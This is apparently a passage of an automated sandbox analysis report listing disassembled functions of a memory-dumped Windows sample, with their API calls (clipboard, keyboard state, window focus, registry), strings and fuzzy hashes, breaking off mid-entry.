Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID:
String ID: Not allowed as an output variable.$This dynamic variable is blank. If this variable was not intended to be dynamic, remove the % symbols from it.$This dynamically built variable name is too long. If this variable was not intended to be dynamic, remove the % symbols from it.
API String ID: 0-4078995249
Opcode ID: bcb218404c281d6fdd2931ffa877d805780b788825002c1b35c34bd107d7b602
Instruction ID: 40aca71c16507a5e3f46b6607a9442e648f694e33212fd620554171d68d2ffb5
Opcode Fuzzy Hash: bcb218404c281d6fdd2931ffa877d805780b788825002c1b35c34bd107d7b602
Instruction Fuzzy Hash: 9581F231740220ABDB10EB25FC91BBE73A1EB91758FA0846BE904C7280D779ED45C3AD

Uniqueness

Uniqueness Score: -1.00%

Function 004490B0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 0041C100: __wcsicoll.LIBCMT ref: 0041C118

_wcsncpy.LIBCMT ref: 00449102
SetVolumeLabelW.KERNEL32(?,?), ref: 0044916B

Part of subcall function 00448CC0: _wcsncpy.LIBCMT ref: 00448CF8
Part of subcall function 00448CC0: GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00448D5C

Strings

\, xrefs: 00449131
$%K, xrefs: 0044917A

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: _wcsncpy$DiskFreeLabelSpaceVolume__wcsicoll
String ID: $%K$\
API String ID: 1863641975-2322972557
Opcode ID: 16777e6d37da3e86e79517493733e6e01c8f9cffb5a541c9b469687af3b777fe
Instruction ID: 3a15300cc2f27f9ece4c3b99a50e1d2665830d547c0be23593c033a9c12ab917
Opcode Fuzzy Hash: 16777e6d37da3e86e79517493733e6e01c8f9cffb5a541c9b469687af3b777fe
Instruction Fuzzy Hash: 90313572B0420057E720AB5E9C85FABB3D8EB95320F15463FFA59C7390EA799C40D399

Uniqueness

Uniqueness Score: -1.00%

Function 00427178, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 82COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 004271A4
__wcsicoll.LIBCMT ref: 004271BE

Strings

wait, xrefs: 0042719E
Parameter #2 invalid., xrefs: 004271D3

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll
String ID: Parameter #2 invalid.$wait
API String ID: 3832890014-1301235001
Opcode ID: b5cd7224a856c32f44214159d0a81e7e180d6878d9edc53f297f3d64e3b0ce8c
Instruction ID: 42d63053ef7bc1134cbf876bc41d3c32f207e381586c0ab3bdcdfb22aa30f819
Opcode Fuzzy Hash: b5cd7224a856c32f44214159d0a81e7e180d6878d9edc53f297f3d64e3b0ce8c
Instruction Fuzzy Hash: CE3192307053908FD720CB19E844BAB77E16B81314FA8485FE9454B3A2DB7EEC85CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00434357, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77registryCOMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 00434419

Part of subcall function 0047E600: _vswprintf_s.LIBCMT ref: 0047E619

RegCloseKey.ADVAPI32(00000000), ref: 00434445

Strings

%s\%s, xrefs: 00434378
ahk_default, xrefs: 00434413

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Close__wcsicoll_vswprintf_s
String ID: %s\%s$ahk_default
API String ID: 1239842080-75935552
Opcode ID: 28aa2ae5f299c728b43cb9d8c8c450ccb18af5d080960addcffd73dfc4654d40
Instruction ID: 1e5c0b74e212fb57542296f531df2923ead6fad5b18ce960cdf24e888b9268a3
Opcode Fuzzy Hash: 28aa2ae5f299c728b43cb9d8c8c450ccb18af5d080960addcffd73dfc4654d40
Instruction Fuzzy Hash: AC21C371609201DBD310CB14C8406ABB7A4EFDD314F18953EE84967341FB78FC468B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0044D0D0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 0040E910: __wcsicoll.LIBCMT ref: 0040E928
Part of subcall function 0040E910: __wcsicoll.LIBCMT ref: 0040E975

__wcsicoll.LIBCMT ref: 0044D0EA
__wcsicoll.LIBCMT ref: 0044D103

Part of subcall function 00417A90: GetKeyState.USER32(00000000), ref: 00417A9B
Part of subcall function 00417A90: GetKeyState.USER32(00000000), ref: 00417ACA
Part of subcall function 00417A90: GetForegroundWindow.USER32(00000000), ref: 00417B04
Part of subcall function 00417A90: GetWindowThreadProcessId.USER32(00000000), ref: 00417B0B
Part of subcall function 00417A90: GetKeyState.USER32(00000014), ref: 00417B4E

Strings

AlwaysOn, xrefs: 0044D0E4
AlwaysOff, xrefs: 0044D0FD

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll$State$Window$ForegroundProcessThread
String ID: AlwaysOff$AlwaysOn
API String ID: 4019425136-824823093
Opcode ID: 9ece26aa6943938864caa665d299d1ef89908a7207682c7709fea573c7ed26d8
Instruction ID: 84d1a481503fbcec885303069628a02d5cbacd7bb606ca23e7eefbc890cce244
Opcode Fuzzy Hash: 9ece26aa6943938864caa665d299d1ef89908a7207682c7709fea573c7ed26d8
Instruction Fuzzy Hash: FD11C8F2D1510157F71067A8EC4679A73D88B55359F14003BF805C6282F77ED9A9829A

Uniqueness

Uniqueness Score: -1.00%

Function 0046607F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 00466089
FlashWindow.USER32 ref: 0046609C
_free.LIBCMT ref: 004660BE

Part of subcall function 004985DD: HeapFree.KERNEL32(00000000,00000000,?,0049C453,00000000,?,0049D9F0,?,0047E61E), ref: 004985F3
Part of subcall function 004985DD: GetLastError.KERNEL32(00000000,?,0049C453,00000000,?,0049D9F0,?,0047E61E), ref: 00498605

Strings

Off, xrefs: 00466083

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: ErrorFlashFreeHeapLastWindow__wcsicoll_free
String ID: Off
API String ID: 1749853394-334568355
Opcode ID: e2cf06783ac8d9f99b594ccc9773aeb65c38a512f4a14dfd7c5e1ce7f065b612
Instruction ID: fe5be0b2d5572cd79374bc1c6f62d7f0e3a378519a15c95be1e450155c014cc0
Opcode Fuzzy Hash: e2cf06783ac8d9f99b594ccc9773aeb65c38a512f4a14dfd7c5e1ce7f065b612
Instruction Fuzzy Hash: F9F03C71A56210ABCA10CF29E840F7A77E4EB99721F41493FF80593350DB3AE8088A5E

Uniqueness

Uniqueness Score: -1.00%

Function 004AB170, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 004AB17A
GetProcAddress.KERNEL32(00000000), ref: 004AB181

Strings

kernel32, xrefs: 004AB175
IsWow64Process, xrefs: 004AB170

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32
API String ID: 1646373207-3789238822
Opcode ID: 46e87b1622565217586ec3051e5b3f47cdaa8a24ed96f635c77a0e4a76cd07a2
Instruction ID: 4143daf520c8ea27201dffbd4de442aa6bc89fa6445bb1990769a08fe20dbb9c
Opcode Fuzzy Hash: 46e87b1622565217586ec3051e5b3f47cdaa8a24ed96f635c77a0e4a76cd07a2
Instruction Fuzzy Hash: DFB092B8A81305AB8B801FF0AC8EE953F64F60DB02321017BB412D12A5DBB800009E6C

Uniqueness

Uniqueness Score: -1.00%

Function 004AB110, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32,RemoveClipboardFormatListener), ref: 004AB11A
GetProcAddress.KERNEL32(00000000), ref: 004AB121

Strings

RemoveClipboardFormatListener, xrefs: 004AB110
user32, xrefs: 004AB115

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: RemoveClipboardFormatListener$user32
API String ID: 1646373207-262861245
Opcode ID: dd3851eccb676997e933a92de8d055677d88514b3481f6a5a88de4f97908234b
Instruction ID: f3be3813f1054b3e7c89a8be0c2d9c018ab16da1740d916fbf97a77d86ccfbd5
Opcode Fuzzy Hash: dd3851eccb676997e933a92de8d055677d88514b3481f6a5a88de4f97908234b
Instruction Fuzzy Hash: 6AB092B4A417089B8B817FF0ACADB497FA8B60D7023A40136F401C12A1DA7800008FAC

Uniqueness

Uniqueness Score: -1.00%

Function 004AB130, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32,AddClipboardFormatListener), ref: 004AB13A
GetProcAddress.KERNEL32(00000000), ref: 004AB141

Strings

AddClipboardFormatListener, xrefs: 004AB130
user32, xrefs: 004AB135

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: AddClipboardFormatListener$user32
API String ID: 1646373207-221531295
Opcode ID: f71118dbd1ce66312a224a19f7d89675f9df22742073f49926b31f9c2b69cab0
Instruction ID: 189a7ec6bc39eb8c5477a9c8317a60ad2ec0714480fac0a2a60e315e3ef26fdc
Opcode Fuzzy Hash: f71118dbd1ce66312a224a19f7d89675f9df22742073f49926b31f9c2b69cab0
Instruction Fuzzy Hash: 3EB092B4A427049BCB812FE0AC9DB457F64B60D7023500137F401C12A1DB7800008EAC

Uniqueness

Uniqueness Score: -1.00%

Function 0043532B, Relevance: 6.3, APIs: 4, Instructions: 260stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00419CE0: __wcstoi64.LIBCMT ref: 00419CF3

__wcsicoll.LIBCMT ref: 0043550F
__wcsicoll.LIBCMT ref: 00435523
lstrcmpiW.KERNEL32(00000000,?,00000000), ref: 0043555E

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll$__wcstoi64lstrcmpi
String ID:
API String ID: 3113806400-0
Opcode ID: 091ca17c767dae9d5a88e9c459918695cca33efca8d31513c09f6b861c822ccb
Instruction ID: a586418fad967f659902f68b087ea25987eff6f0f21387a406612a70feb93a94
Opcode Fuzzy Hash: 091ca17c767dae9d5a88e9c459918695cca33efca8d31513c09f6b861c822ccb
Instruction Fuzzy Hash: 77814931704F1067E7245B14D80177B73A29BA8B14F28216BED456F3C6EBAEEC81878D

Uniqueness

Uniqueness Score: -1.00%

Function 00440030, Relevance: 6.1, APIs: 4, Instructions: 95threadwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 0044D1B0: GetForegroundWindow.USER32(?,?,0043FD55,?), ref: 0044D1DE
Part of subcall function 0044D1B0: IsWindowVisible.USER32(00000000), ref: 0044D1F9

GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004400A7
AttachThreadInput.USER32(00001570,00000000,00000001), ref: 004400CF
SetFocus.USER32(?), ref: 004400DF
AttachThreadInput.USER32(00001570,00000000,00000000), ref: 00440126

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: ThreadWindow$AttachInput$FocusForegroundProcessVisible
String ID:
API String ID: 2591045477-0
Opcode ID: fa1e6bd241a89d7b85bc76a8f99b230a6f50bc3afe5d43b318014b671a33506c
Instruction ID: 0d5aa43f1e5a5a23dc04cc9e3314ab25cc87c909855218d9c43a2c1ff640dc89
Opcode Fuzzy Hash: fa1e6bd241a89d7b85bc76a8f99b230a6f50bc3afe5d43b318014b671a33506c
Instruction Fuzzy Hash: 2A21373234030167E620EB65BC81F6B7798DB96725F14452FF610AB2D2DABAE811C76C

Uniqueness

Uniqueness Score: -1.00%

Function 00483220, Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 00483298
EnumChildWindows.USER32 ref: 004832D9
EnumChildWindows.USER32 ref: 00483305

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: ChildEnumWindows$_wcsncpy
String ID:
API String ID: 1330499146-0
Opcode ID: d52bc6fbdedd7bcd98556feec11ecdc08cbefb5193fdfdc8a3e5f9091889e079
Instruction ID: 3097c33f5b4710be0bd5b558e7757a75fba4f9e633b3c12ab965be284a07ffe8
Opcode Fuzzy Hash: d52bc6fbdedd7bcd98556feec11ecdc08cbefb5193fdfdc8a3e5f9091889e079
Instruction Fuzzy Hash: 2E21A57164534596C334EF25DC416EFB3D8EF94B11F48492EED8882240EB7E9A49839E

Uniqueness

Uniqueness Score: -1.00%

Function 004722C0, Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 004722F8
GetWindowRect.USER32 ref: 0047231C
GetWindowRect.USER32 ref: 00472326
IntersectRect.USER32 ref: 00472337

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Rect$Window$IntersectParent
String ID:
API String ID: 3824346474-0
Opcode ID: 7bfb42222dff364cf8241c72ba09ef9f11fe47029658b16011f9b1181df2edc7
Instruction ID: c82c031aee38648189bb2ad0455be0c6a84adf7ba5696181474b11667e9dfc6c
Opcode Fuzzy Hash: 7bfb42222dff364cf8241c72ba09ef9f11fe47029658b16011f9b1181df2edc7
Instruction Fuzzy Hash: FE218D725093459FC314DF64CA849ABFBE4FB95310F048A2EF98953210D63AE919CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00476060, Relevance: 6.1, APIs: 4, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetIconInfo.USER32(?,?), ref: 004760AE
GetObjectW.GDI32(?,00000018,?), ref: 004760C4
DeleteObject.GDI32(?), ref: 004760EC
DeleteObject.GDI32(?), ref: 004760F3

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: Object$Delete$IconInfo
String ID:
API String ID: 507670407-0
Opcode ID: 7266f9f4c3dd8f405baa1db73c1f502ab6060669b63328046889d0fb68093194
Instruction ID: 26ff792f1627f643f7149c9ed8b48c5df8ef6469b64d9b6c4bdcf4d74f27bcec
Opcode Fuzzy Hash: 7266f9f4c3dd8f405baa1db73c1f502ab6060669b63328046889d0fb68093194
Instruction Fuzzy Hash: 311181713046429BD714DF2AC840AA7B7EABF84310B06C56EE80DC7350EB35ED02CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00413040, Relevance: 6.1, APIs: 4, Instructions: 58COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004130B4
_free.LIBCMT ref: 004130BD
_free.LIBCMT ref: 004130C6
_free.LIBCMT ref: 004130D8

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 5ac42c2fc670153a6906ae3dfa72fddb4676815a62777f897b0bca05cd7f3be3
Instruction ID: aaa822eb1d905cb86480dd6aeb6df2c7c2183c92bb7e7215cc4d415be77db04b
Opcode Fuzzy Hash: 5ac42c2fc670153a6906ae3dfa72fddb4676815a62777f897b0bca05cd7f3be3
Instruction Fuzzy Hash: B1116775600B00AFCB20DF6AC880B93B7E8BF8C710F04895DE55A87354DB3AE941CB65

Uniqueness

Uniqueness Score: -1.00%

Function 004051A0, Relevance: 6.1, APIs: 4, Instructions: 51clipboardCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 004051BB
OpenClipboard.USER32(?), ref: 004051CC
GetTickCount.KERNEL32 ref: 004051E0
OpenClipboard.USER32(?), ref: 0040521A

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: ClipboardCountOpenTick
String ID:
API String ID: 420724667-0
Opcode ID: 69846a95dd183dbb8bc7b342efddba8ad38b149d1978b5285e96f7b2202c524a
Instruction ID: 79914eeec008a9af804cf7d6a82baea711cf88422f79318d447b46c9599d9bbe
Opcode Fuzzy Hash: 69846a95dd183dbb8bc7b342efddba8ad38b149d1978b5285e96f7b2202c524a
Instruction Fuzzy Hash: 970157327016019BD3108B68EC84B5737AAAB94329F14803BE500DB3D4D779DC95CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00413010, Relevance: 6.0, APIs: 4, Instructions: 17COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00413014

Part of subcall function 004985DD: HeapFree.KERNEL32(00000000,00000000,?,0049C453,00000000,?,0049D9F0,?,0047E61E), ref: 004985F3
Part of subcall function 004985DD: GetLastError.KERNEL32(00000000,?,0049C453,00000000,?,0049D9F0,?,0047E61E), ref: 00498605

_free.LIBCMT ref: 0041301D
_free.LIBCMT ref: 00413026
_free.LIBCMT ref: 00413038

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a9814130f5be7acf327a421203b38ddd0688270a1ea487ab6afaa44601d72deb
Instruction ID: ae45d2f4ff77fe902621de4fed83a86a85762127e17430abc0764e5b42f22964
Opcode Fuzzy Hash: a9814130f5be7acf327a421203b38ddd0688270a1ea487ab6afaa44601d72deb
Instruction Fuzzy Hash: 05D012725007006BCE34AB7AC445E1777E46B49324B414A1EB55647941CE3CE549CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00403300, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00403B20: GetTickCount.KERNEL32 ref: 00403B52

GetTickCount.KERNEL32 ref: 00403388
_wcsncpy.LIBCMT ref: 004033FE

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000D), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Strings

Timer, xrefs: 00403466

Memory Dump Source

Source File: 00000015.00000002.869542624.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.869532943.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869660701.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869678814.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.869693670.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869706669.00000000004D8000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.869714545.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_nMv8.jbxd

Similarity

API ID: AvailableClipboardCountFormatTick$_wcsncpy
String ID: Timer
API String ID: 1301760726-2870079774
Opcode ID: d7bd92263972ba15a3ffc6b05d173e7a7421f7a6b314214b8f3e31e05dbe6696
Instruction ID: 6a76866c6296d9bd35f008eb96c576d71ed6ca996de63abb385955c31e4edab6
Opcode Fuzzy Hash: d7bd92263972ba15a3ffc6b05d173e7a7421f7a6b314214b8f3e31e05dbe6696
Instruction Fuzzy Hash: F55131306043406BD731DF26D841B27BBE8AB41316F14897FE8852A6D1CB7CBA84CB8D

Uniqueness

Uniqueness Score: -1.00%

Function 00412050, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 126COMMON

Download Yara Rule

APIs

